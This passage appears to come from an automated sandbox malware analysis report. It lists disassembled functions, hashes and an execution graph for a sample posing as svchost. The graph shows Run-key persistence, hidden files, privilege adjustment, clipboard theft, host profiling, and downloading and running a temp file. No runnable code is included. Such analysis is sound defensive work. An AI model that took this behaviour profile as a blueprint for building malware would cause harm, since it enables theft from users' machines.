                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B0188A1A1858652DFA0EB24EC643AA9364FB98B44FD04033D24DC35A8EE3CD249CB11
                                                                                                                                                                                                                          Function 00007FF7E52B3B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: 6564cf23917d6a87b606184b7296d09634800162ee19dcede5aa38be54c2d556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5014C76618A808ADB909F14F85471AB778F788B94F901226EB8D83B68DF7CC144CF11
                                                                                                                                                                                                                          Function 00007FF7E52B39B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: 6c6fa1464ff4f5b2fc11fb66302106246aadef941fdf2229d2bd956d9c47cad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9116672528B4486DB909B14F85072AB7A4FB88BA0F505331F96E83BE8DF7CD144CB11
                                                                                                                                                                                                                          Function 00007FF7E52B2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7E52B3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7E52B304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                                          • Instruction ID: 651a06c44d721a237996f569c9899331d2e0da680c1933684e6e31ab98354fb5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41110DA0918A8A85EB90FB10EC643A5B7A8FB8CB04F844136D58CD3665DF3CE0458762

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:2.4%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:10.6%
                                                                                                                                                                                                                          Total number of Nodes:395
                                                                                                                                                                                                                          Total number of Limit Nodes:17
                                                                                                                                                                                                                          execution_graph 39425 e8b8aa0 39432 e8b88b0 39425->39432 39427 e8b8b23 39428 e8b8ae0 OpenThread 39429 e8b8acc _close_nolock 39428->39429 39430 e8b8afc SuspendThread 39428->39430 39429->39427 39429->39428 39440 e8b8ea0 39430->39440 39437 e8b88d6 realloc _DllMainCRTStartup _getptd_noexit 39432->39437 39433 e8b89ad _close_nolock 39444 e8ce010 39433->39444 39435 e8b89c3 39435->39429 39436 e8b8990 Thread32Next 39436->39433 39436->39437 39437->39433 39437->39436 39438 e8b892b HeapAlloc 39437->39438 39438->39433 39439 e8b894f 39438->39439 39439->39437 39443 e8b8eda _DllMainCRTStartup 39440->39443 39441 e8ce010 __crtCompareStringA_stat 3 API calls 39442 e8b8fd3 39441->39442 39442->39429 39443->39441 39445 e8ce019 39444->39445 39446 e8ce024 39445->39446 39447 e8ce574 IsProcessorFeaturePresent 39445->39447 39446->39435 39448 e8ce58b 39447->39448 39451 e8d4e48 RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 39448->39451 39450 e8ce59e 39450->39435 39451->39450 39452 e8b8750 39454 e8b8781 _DllMainCRTStartup 39452->39454 39453 e8b87a4 39454->39453 39455 e8b880f FlushInstructionCache 39454->39455 39455->39453 39456 e8b8b50 39460 e8b8b7a _DllMainCRTStartup 39456->39460 39457 e8b8ca2 _DllMainCRTStartup 39458 e8ce010 __crtCompareStringA_stat 3 API calls 39457->39458 39459 e8b8cd2 39458->39459 39460->39457 39472 e8b7930 39460->39472 39464 e8b8be2 39465 e8b8bea 39464->39465 39466 e8b8c95 39464->39466 39476 e8b84d0 HeapAlloc realloc 39465->39476 39478 e8b7a90 VirtualFree VirtualFree 39466->39478 39469 e8b8bef 39471 e8b8bfb 39469->39471 39477 e8b7a90 VirtualFree VirtualFree 39469->39477 39471->39457 39479 e8b7b10 GetSystemInfo 39472->39479 39474 e8b7939 39474->39457 39475 e8b9060 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry __crtCompareStringA_stat _DllMainCRTStartup 39474->39475 39475->39464 39476->39469 39477->39471 39478->39457 39480 e8b7b45 _DllMainCRTStartup 39479->39480 39480->39474 39481 e8b8fe0 39482 e8b904f 39481->39482 39486 e8b8fef _close_nolock 39481->39486 39483 e8b9038 HeapFree 39483->39482 39484 e8b9000 OpenThread 39485 e8b901a ResumeThread 39484->39485 39484->39486 39485->39486 39486->39483 39486->39484 39487 e8b9033 39486->39487 39487->39483 39488 e8b17f0 39533 e8b2660 39488->39533 39490 e8b1865 39491 e8b2660 45 API calls 39490->39491 39492 e8b1870 39491->39492 39542 e8cd70c 39492->39542 39495 e8b189d setSBCS 39497 e8b18ba SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 39495->39497 39496 e8b1891 lstrcpyA 39496->39495 39498 e8b1929 lstrcmpiA 39497->39498 39499 e8b19a1 lstrcatA 39497->39499 39498->39499 39501 e8b193d lstrcmpiA 39498->39501 39500 e8b19be lstrcmpiA lstrcmpiA 39499->39500 39502 e8b19ec _DllMainCRTStartup 39500->39502 39503 e8b19f1 39500->39503 39501->39499 39504 e8b1951 lstrcmpiA 39501->39504 39509 e8b19fe CreateThread 39502->39509 39503->39502 39506 e8b1a1b 39503->39506 39504->39499 39505 e8b1965 lstrcmpiA 39504->39505 39505->39499 39507 e8b1979 lstrcmpiA 39505->39507 39559 e8b2720 39506->39559 39507->39499 39508 e8b198d lstrcmpiA 39507->39508 39508->39499 39508->39500 39509->39506 39511 e8b1c1d 39570 e8cd6cc 43 API calls 3 library calls 39511->39570 39512 e8b1a33 39512->39511 39513 e8b1aa5 39512->39513 39518 e8b1ac6 setSBCS _DllMainCRTStartup 39513->39518 39568 e8b17a0 GetNativeSystemInfo IsWow64Process 39513->39568 39515 e8b1c25 39571 e8cd6cc 43 API calls 3 library calls 39515->39571 39526 e8b1b14 CreateFileA WriteFile WriteFile 39518->39526 39519 e8b1ab4 39521 e8b1ab8 39519->39521 39522 e8b1ad3 TerminateProcess 39519->39522 39520 e8b1c2d 39572 e8cd6cc 43 API calls 3 library calls 39520->39572 39569 e8b1370 50 API calls 6 library calls 39521->39569 39522->39518 39525 e8b1c35 39573 e8cd6cc 43 API calls 3 library calls 39525->39573 39528 e8b1b8c 6 API calls 39526->39528 39529 e8b1c14 _close_nolock 39526->39529 39528->39529 39529->39511 39530 e8b1c3e 39531 e8ce010 __crtCompareStringA_stat 3 API calls 39530->39531 39532 e8b1c50 39531->39532 39534 e8b266e 39533->39534 39535 e8b2676 WideCharToMultiByte 39533->39535 39534->39490 39536 e8b26af 39535->39536 39537 e8b26c1 39535->39537 39536->39490 39538 e8cd70c malloc 43 API calls 39537->39538 39539 e8b26d0 39538->39539 39540 e8b26d8 WideCharToMultiByte 39539->39540 39541 e8b2702 39539->39541 39540->39541 39541->39490 39543 e8cd724 39542->39543 39544 e8cd7a0 39542->39544 39546 e8cd75c HeapAlloc 39543->39546 39547 e8cd73c 39543->39547 39551 e8cd785 39543->39551 39556 e8cd78a 39543->39556 39577 e8d0d88 DecodePointer 39543->39577 39580 e8d0d88 DecodePointer 39544->39580 39546->39543 39552 e8b187d PathFindFileNameA 39546->39552 39547->39546 39574 e8d08b4 43 API calls 2 library calls 39547->39574 39575 e8d0928 43 API calls 7 library calls 39547->39575 39576 e8d0e08 GetProcAddress ExitProcess __crtCorExitProcess 39547->39576 39548 e8cd7a5 39581 e8cf4b0 43 API calls _getptd_noexit 39548->39581 39578 e8cf4b0 43 API calls _getptd_noexit 39551->39578 39552->39495 39552->39496 39579 e8cf4b0 43 API calls _getptd_noexit 39556->39579 39560 e8b27bd 39559->39560 39561 e8b2734 MultiByteToWideChar 39559->39561 39560->39512 39562 e8b2769 39561->39562 39563 e8b275c 39561->39563 39564 e8cd70c malloc 43 API calls 39562->39564 39563->39512 39565 e8b277b 39564->39565 39566 e8b2793 MultiByteToWideChar 39565->39566 39567 e8b2783 39565->39567 39566->39560 39567->39512 39568->39519 39569->39518 39570->39515 39571->39520 39572->39525 39573->39530 39574->39547 39575->39547 39577->39543 39578->39556 39579->39552 39580->39548 39581->39552 39582 e8cefb0 39583 e8cefcc 39582->39583 39586 e8cefd1 39582->39586 39596 e8d671c GetSystemTimeAsFileTime GetTickCount64 GetTickCount64 QueryPerformanceCounter _getptd_noexit 39583->39596 39585 e8cf05c 39594 e8cf026 39585->39594 39598 e8cb5d0 39585->39598 39586->39585 39586->39594 39597 e8cee58 75 API calls 16 library calls 39586->39597 39588 e8cf07a 39589 e8cf0a3 39588->39589 39591 e8cb5d0 _DllMainCRTStartup 247 API calls 39588->39591 39589->39594 39608 e8cee58 75 API calls 16 library calls 39589->39608 39593 e8cf096 39591->39593 39607 e8cee58 75 API calls 16 library calls 39593->39607 39596->39586 39597->39585 39599 e8cb5d8 39598->39599 39600 e8cb5f0 _DllMainCRTStartup 39598->39600 39601 e8cb5fc 39599->39601 39609 e8b5590 LoadLibraryA GetProcAddress 39599->39609 39657 e8b8e20 14 API calls _DllMainCRTStartup 39600->39657 39601->39588 39607->39589 39608->39594 39610 e8b619d 13 API calls 39609->39610 39611 e8b62a3 _DllMainCRTStartup 39610->39611 39658 e8bf540 39611->39658 39613 e8b7173 39614 e8bf540 _DllMainCRTStartup 2 API calls 39613->39614 39615 e8b7186 39614->39615 39616 e8bf540 _DllMainCRTStartup 2 API calls 39615->39616 39617 e8b7199 39616->39617 39618 e8bf540 _DllMainCRTStartup 2 API calls 39617->39618 39619 e8b71ac 39618->39619 39620 e8bf540 _DllMainCRTStartup 2 API calls 39619->39620 39621 e8b71bf 39620->39621 39622 e8bf540 _DllMainCRTStartup 2 API calls 39621->39622 39623 e8b71d2 39622->39623 39624 e8cb410 39623->39624 39665 e8c50a0 39624->39665 39627 e8cb4bd lstrcmpiA 39630 e8cb4db lstrcmpiA 39627->39630 39633 e8cb4d1 _DllMainCRTStartup 39627->39633 39628 e8cb47d 39667 e8cb3c0 CreateMutexA 39628->39667 39631 e8cb4fb lstrcmpiA 39630->39631 39634 e8cb4ef _DllMainCRTStartup 39630->39634 39635 e8cb51e lstrcmpiA 39631->39635 39636 e8cb50f _DllMainCRTStartup 39631->39636 39632 e8cb489 _DllMainCRTStartup 39632->39627 39643 e8cb492 CreateThread 39632->39643 39687 e8ca160 72 API calls _DllMainCRTStartup 39633->39687 39688 e8c98c0 157 API calls 3 library calls 39634->39688 39638 e8cb541 lstrcmpiA 39635->39638 39639 e8cb532 _DllMainCRTStartup 39635->39639 39689 e8c98c0 157 API calls 3 library calls 39636->39689 39640 e8cb564 lstrcmpiA 39638->39640 39641 e8cb555 _DllMainCRTStartup 39638->39641 39690 e8c98c0 157 API calls 3 library calls 39639->39690 39644 e8cb578 _DllMainCRTStartup 39640->39644 39645 e8cb589 CreateThread 39640->39645 39691 e8c98c0 157 API calls 3 library calls 39641->39691 39669 e8b1c70 39643->39669 39869 e8c7540 39643->39869 39692 e8c98c0 157 API calls 3 library calls 39644->39692 39649 e8cb5aa 39645->39649 39653 e8ce010 __crtCompareStringA_stat 3 API calls 39649->39653 39655 e8cb5bc 39653->39655 39655->39588 39656 e8cb587 39656->39649 39657->39601 39659 e8bf5dd 39658->39659 39660 e8bf554 MultiByteToWideChar 39658->39660 39659->39613 39661 e8bf57c 39660->39661 39662 e8bf589 39660->39662 39661->39613 39663 e8bf5b3 MultiByteToWideChar 39662->39663 39664 e8bf5a3 39662->39664 39663->39659 39664->39613 39666 e8c50ac GetModuleFileNameA PathFindFileNameA lstrcmpiA 39665->39666 39666->39627 39666->39628 39668 e8cb3de _mbstowcs_l_helper _close_nolock 39667->39668 39668->39632 39693 e8bf170 39669->39693 39673 e8b1cab _DllMainCRTStartup 39715 e8b8db0 39673->39715 39675 e8b1cc8 39720 e8b8ce0 GetProcAddress _DllMainCRTStartup 39675->39720 39677 e8b1ce9 39721 e8b8ce0 GetProcAddress _DllMainCRTStartup 39677->39721 39679 e8b1d0a _DllMainCRTStartup 39680 e8ce010 __crtCompareStringA_stat 3 API calls 39679->39680 39681 e8b1d23 39680->39681 39682 e8c5710 39681->39682 39730 e8c5570 39682->39730 39688->39631 39689->39635 39690->39638 39691->39640 39692->39656 39722 e8bf040 39693->39722 39695 e8bf1c4 _DllMainCRTStartup 39696 e8bf1db lstrcatW lstrcatW CreateDirectoryW 39695->39696 39727 e8e0200 39696->39727 39698 e8bf212 lstrcatW lstrcatW lstrcatW 39699 e8ce010 __crtCompareStringA_stat IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 39698->39699 39700 e8b1c93 39699->39700 39701 e8bf2e0 CreateFileW 39700->39701 39702 e8bf323 39701->39702 39703 e8bf330 GetFileSize 39701->39703 39702->39673 39728 e8e0058 39703->39728 39705 e8bf356 HeapAlloc 39706 e8bf372 ReadFile 39705->39706 39710 e8bf3b0 _close_nolock 39705->39710 39707 e8bf399 _heap_init 39706->39707 39708 e8bf38f 39706->39708 39709 e8bf39f HeapFree 39707->39709 39708->39707 39711 e8bf3bd _DllMainCRTStartup 39708->39711 39709->39710 39710->39673 39711->39710 39712 e8bf401 _heap_init 39711->39712 39713 e8bf417 HeapAlloc 39712->39713 39713->39710 39714 e8bf430 __init_monetary 39713->39714 39714->39710 39716 e8b8dbd _DllMainCRTStartup 39715->39716 39717 e8b8e03 _DllMainCRTStartup 39716->39717 39718 e8b8dc6 HeapCreate 39716->39718 39717->39675 39719 e8b8ddf _DllMainCRTStartup 39718->39719 39719->39675 39720->39677 39721->39679 39723 e8bf099 _DllMainCRTStartup 39722->39723 39724 e8bf127 wsprintfW 39723->39724 39725 e8ce010 __crtCompareStringA_stat 3 API calls 39724->39725 39726 e8bf15b 39725->39726 39726->39695 39729 e8e005f 39728->39729 39731 e8c55b5 setSBCS 39730->39731 39732 e8c561d GetUserNameW GetComputerNameW 39731->39732 39755 e8bf480 39732->39755 39734 e8c5655 39735 e8bf480 _DllMainCRTStartup 3 API calls 39734->39735 39736 e8c5664 GetNativeSystemInfo GetVersionExA 39735->39736 39737 e8c56d3 _DllMainCRTStartup 39736->39737 39762 e8b9450 39737->39762 39740 e8ce010 __crtCompareStringA_stat 3 API calls 39741 e8c56f6 39740->39741 39742 e8c50d0 39741->39742 39743 e8c5100 lstrcpyA 39742->39743 39744 e8b9450 _DllMainCRTStartup 42 API calls 39743->39744 39747 e8c5141 _DllMainCRTStartup 39744->39747 39745 e8c51c7 free 39850 e8f0868 39745->39850 39747->39745 39749 e8c5170 StrChrA 39747->39749 39750 e8c5160 39747->39750 39748 e8c51db SleepEx 39752 e8c5191 _DllMainCRTStartup 39749->39752 39751 e8c5570 _DllMainCRTStartup 50 API calls 39750->39751 39753 e8c5165 39751->39753 39752->39745 39752->39749 39840 e8c5450 39752->39840 39753->39745 39756 e8bf48e 39755->39756 39757 e8bf496 WideCharToMultiByte 39755->39757 39756->39734 39758 e8bf4cf 39757->39758 39759 e8bf4e1 malloc 39757->39759 39758->39734 39760 e8bf4f8 WideCharToMultiByte 39759->39760 39761 e8bf522 39759->39761 39760->39761 39761->39734 39763 e8b95aa memcpy lstrlenA 39762->39763 39766 e8b948d __lock_fhandle _DllMainCRTStartup 39762->39766 39788 e8bf260 39763->39788 39768 e8b94ab lstrcpyA 39766->39768 39782 e8bef20 39768->39782 39769 e8b962a 39772 e8bf260 _DllMainCRTStartup lstrlenA 39769->39772 39773 e8b963f 39772->39773 39776 e8ce010 __crtCompareStringA_stat 3 API calls 39773->39776 39774 e8b95f1 39774->39769 39777 e8b72c0 _DllMainCRTStartup 34 API calls 39774->39777 39775 e8b72c0 _DllMainCRTStartup 34 API calls 39780 e8b955c 39775->39780 39779 e8b9664 free 39776->39779 39777->39774 39778 e8b958f _mtinitlocknum 39778->39763 39779->39740 39780->39778 39781 e8b72c0 _DllMainCRTStartup 34 API calls 39780->39781 39781->39780 39835 e8e0208 39782->39835 39784 e8bef72 GetVolumeInformationA 39785 e8befc6 _DllMainCRTStartup 39784->39785 39786 e8ce010 __crtCompareStringA_stat IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 39785->39786 39787 e8b94ec lstrcpyA lstrcatA lstrcatA 39786->39787 39787->39775 39789 e8b95e7 39788->39789 39790 e8bf264 39788->39790 39792 e8b72c0 39789->39792 39791 e8bf282 lstrlenA 39790->39791 39791->39789 39791->39791 39793 e8c50a0 setSBCS 39792->39793 39794 e8b7303 6 API calls 39793->39794 39795 e8b73e0 lstrcatA WSAStartup 39794->39795 39796 e8b7386 39794->39796 39798 e8b7870 _DllMainCRTStartup 39795->39798 39803 e8b7434 _DllMainCRTStartup 39795->39803 39796->39795 39797 e8b738c lstrcatA 39796->39797 39836 e8f0718 39797->39836 39801 e8b78bf free 39798->39801 39827 e8b7894 39798->39827 39802 e8b78cb closesocket WSACleanup 39801->39802 39804 e8ce010 __crtCompareStringA_stat 3 API calls 39802->39804 39803->39798 39806 e8b7468 memcpy htons 39803->39806 39805 e8b7914 39804->39805 39805->39774 39807 e8b74a5 _DllMainCRTStartup 39806->39807 39807->39798 39808 e8b74ae lstrlenA send 39807->39808 39808->39798 39809 e8b74d9 39808->39809 39810 e8b74e2 send 39809->39810 39817 e8b74fa setSBCS _DllMainCRTStartup 39809->39817 39810->39798 39810->39817 39811 e8b7925 39839 e8ce648 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry __report_securityfailure 39811->39839 39812 e8b75ca lstrlenA 39816 e8b7699 39812->39816 39812->39817 39813 e8b75a5 lstrcmpiA 39813->39798 39813->39817 39815 e8b792a 39818 e8b76a2 39816->39818 39819 e8b784c 39816->39819 39820 e8b76b4 malloc 39816->39820 39817->39798 39817->39811 39817->39812 39817->39813 39822 e8b75fd lstrcmpiA 39817->39822 39818->39798 39821 e8b76aa 39818->39821 39823 e8b789c malloc 39819->39823 39824 e8b7851 malloc 39819->39824 39834 e8b76f0 _DllMainCRTStartup 39820->39834 39821->39820 39822->39817 39825 e8b763e lstrcmpiA 39822->39825 39823->39802 39824->39798 39825->39817 39826 e8b7652 lstrcmpiA 39825->39826 39826->39817 39827->39802 39828 e8b7830 39828->39801 39829 e8b791f 39838 e8ce648 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry __report_securityfailure 39829->39838 39831 e8b7924 39831->39811 39832 e8b7835 39832->39802 39833 e8b779a realloc 39833->39834 39834->39801 39834->39828 39834->39829 39834->39832 39834->39833 39837 e8f071f 39836->39837 39838->39831 39839->39815 39841 e8c5514 setSBCS 39840->39841 39843 e8c547a setSBCS 39840->39843 39844 e8c51e0 _DllMainCRTStartup 48 API calls 39841->39844 39842 e8ce010 __crtCompareStringA_stat 3 API calls 39845 e8c5551 39842->39845 39849 e8c54dd _DllMainCRTStartup 39843->39849 39852 e8c51e0 39843->39852 39844->39849 39845->39752 39848 e8bf170 _DllMainCRTStartup 10 API calls 39848->39849 39849->39842 39851 e8f088f 39850->39851 39853 e8c5227 setSBCS 39852->39853 39854 e8c525e lstrlenA InternetCrackUrlA 39853->39854 39856 e8c52a5 setSBCS 39854->39856 39867 e8c53d9 39854->39867 39855 e8ce010 __crtCompareStringA_stat 3 API calls 39857 e8c542d 39855->39857 39858 e8b72c0 _DllMainCRTStartup 34 API calls 39856->39858 39856->39867 39857->39848 39857->39849 39860 e8c52eb _DllMainCRTStartup 39858->39860 39859 e8c5411 free 39859->39867 39860->39859 39861 e8bf540 _DllMainCRTStartup 2 API calls 39860->39861 39862 e8c5316 _DllMainCRTStartup 39861->39862 39862->39859 39863 e8c533c GetTempFileNameW lstrcatW lstrcatW CreateFileW 39862->39863 39863->39859 39864 e8c539f WriteFile 39863->39864 39865 e8c5408 CloseHandle 39864->39865 39866 e8c53c0 free CloseHandle 39864->39866 39865->39859 39866->39867 39868 e8c53e0 ShellExecuteW 39866->39868 39867->39855 39868->39865 39868->39867 39873 e8c756a _calloc_crt _DllMainCRTStartup 39869->39873 39871 e8b2c20 76 API calls _DllMainCRTStartup 39871->39873 39872 e8b2c20 76 API calls _DllMainCRTStartup 39874 e8c75a8 _DllMainCRTStartup 39872->39874 39873->39871 39873->39874 39877 e8c7c20 45 API calls 39873->39877 39879 e8c7af0 OpenClipboard 39873->39879 39874->39872 39874->39873 39875 e8c7c90 45 API calls 39874->39875 39876 e8b1100 45 API calls _DllMainCRTStartup 39874->39876 39878 e8c7ce0 7 API calls 39874->39878 39875->39874 39876->39874 39877->39873 39878->39874 39880 e8c7b0b GetClipboardData 39879->39880 39881 e8c7b64 39879->39881 39882 e8c7b3b CloseClipboard 39880->39882 39883 e8c7b21 GlobalLock 39880->39883 39891 e8b2c20 39881->39891 39882->39881 39886 e8c7b4b 39882->39886 39883->39882 39885 e8c7b2f GlobalUnlock 39883->39885 39885->39882 39890 e8b1100 45 API calls _DllMainCRTStartup 39886->39890 39889 e8c7b56 39889->39873 39890->39889 39892 e8b2c3d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 39891->39892 39895 e8b2080 39892->39895 39894 e8b2c74 39894->39873 39896 e8b20a9 _DllMainCRTStartup 39895->39896 39897 e8b20b2 _DllMainCRTStartup 39896->39897 39898 e8b2146 39896->39898 39901 e8b20ec 39897->39901 39902 e8b20d4 39897->39902 39911 e8b2040 45 API calls _DllMainCRTStartup 39898->39911 39910 e8b1e90 45 API calls _DllMainCRTStartup 39901->39910 39908 e8b23f0 76 API calls 2 library calls 39902->39908 39905 e8b20dd 39909 e8b2370 76 API calls 2 library calls 39905->39909 39907 e8b20ea char_traits _DllMainCRTStartup 39907->39894 39908->39905 39909->39907 39910->39907

                                                                                                                                                                                                                          Executed Functions

